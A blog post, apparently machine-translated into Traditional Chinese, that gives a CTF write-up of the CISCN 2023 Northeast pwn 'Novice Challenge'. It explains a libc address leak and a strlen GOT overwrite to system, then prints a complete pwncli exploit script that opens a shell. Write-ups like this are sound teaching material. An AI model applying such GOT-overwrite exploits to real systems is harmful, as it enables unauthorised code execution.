BuringStraw

BuringStraw

首頁封存

CISCN 2023 東北賽區 pwn

#pwn44
AI 翻譯
這篇文章透過AI由簡體中文翻譯成繁體中文查看原文
AI 生成的摘要
CISCN 2023 东北赛区 pwn比赛中的Novice Challenge,需要改变strlen的got表来泄漏libc地址。Exp脚本中包含了利用方法和一些附注。

(緩慢更新中 1/4)

新手挑戰#

一句話版本:改 strlen 的 got 表

首先從 sub_96B 中洩漏 libc 地址:

int sub_96B()
{
  int v1; // [rsp+Ch] [rbp-264h] BYREF
  __int64 v2[44]; // [rsp+10h] [rbp-260h] BYREF
  char v3[252]; // [rsp+170h] [rbp-100h] BYREF
  int v4; // [rsp+26Ch] [rbp-4h]

  v4 = 4;
  puts("歡迎來到這個挑戰!");
  v2[0] = (__int64)&puts;
  __isoc99_scanf("%252s", v3);
  puts("祝你好運!");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 15 && v1 <= 21 )
    v4 = v1;
  else
    puts("不行!");
  puts("禮物:");
  return puts((const char *)&v2[v4]);
}

目標是得到 v2 [0] 中的 puts 的地址。
由於 scanf % s 會在字串後面補 0,且長度限制是不算這個 0 的。所以只要輸入 252 個字元就會把 v4 覆蓋成 0,然後再輸入一個不會進 if 的數字就行了。

接下來看

int sub_A31()
{
  size_t v0; // rax

  puts("index>>");
  __isoc99_scanf("%d", &dword_2020BC);
  if ( (unsigned int)dword_2020BC >= 0x20 )
  {
    puts("不行!");
    exit(1);
  }
  puts("輸入>>");
  read(0, byte_2020A0, 0x20uLL);
  v0 = strlen(byte_2020A0);
  printf("資料長度為 %d\n", v0);
  puts("再見~");
  read(0, &byte_2020A0[dword_2020BC], 4uLL);
  return close(1);
}

2020a0+0x20>2020bc,所以可以將這個索引覆蓋掉,寫到別的地方去。
strlen 的 got 在 2020a0-136 的位置。負數取補碼。

Exp:

#!/usr/bin/env python3

from pwncli import *

cli_script()

libc: ELF = gift.libc
filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug


if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

sla("挑戰!", "a" * 252)

sla("好運!", "0")

lb = recv_current_libc_addr(0x80970, 0x1000)

libc.address = lb

leak_ex2(lb)

sla("index>>\n", "0")

sa("輸入>>", flat({0: "/bin/sh;", 0x1C: p32(0xFFFFFF78)}))
print(hex(libc.sym.system))
sa("再見", flat(libc.sym.system)[:-4])

rl()
ia()

附註:
1、sub_96b 的那個陣列中後續的位置會出現一個 ld.so 中的函數地址(僅在使用靶機版本的 libc 時出現),利用見:https://www.cnblogs.com/7resp4ss/p/17530599.html

2、使用 patchelf 修改程式的 libc 和ld.so (interpreter)。只改 libc 可能會炸掉。

patchelf --set-interpreter /home/w1nd/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so /home/w1nd/Desktop/pwn
patchelf --replace-needed libc.so.6 /home/w1nd/Desktop/buu/libc-2.23-x64.so pwn

見:https://www.cnblogs.com/xshhc/p/16777707.html
3、Linux ELF 與動態連結庫 https://juejin.cn/post/6939332933677219848

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。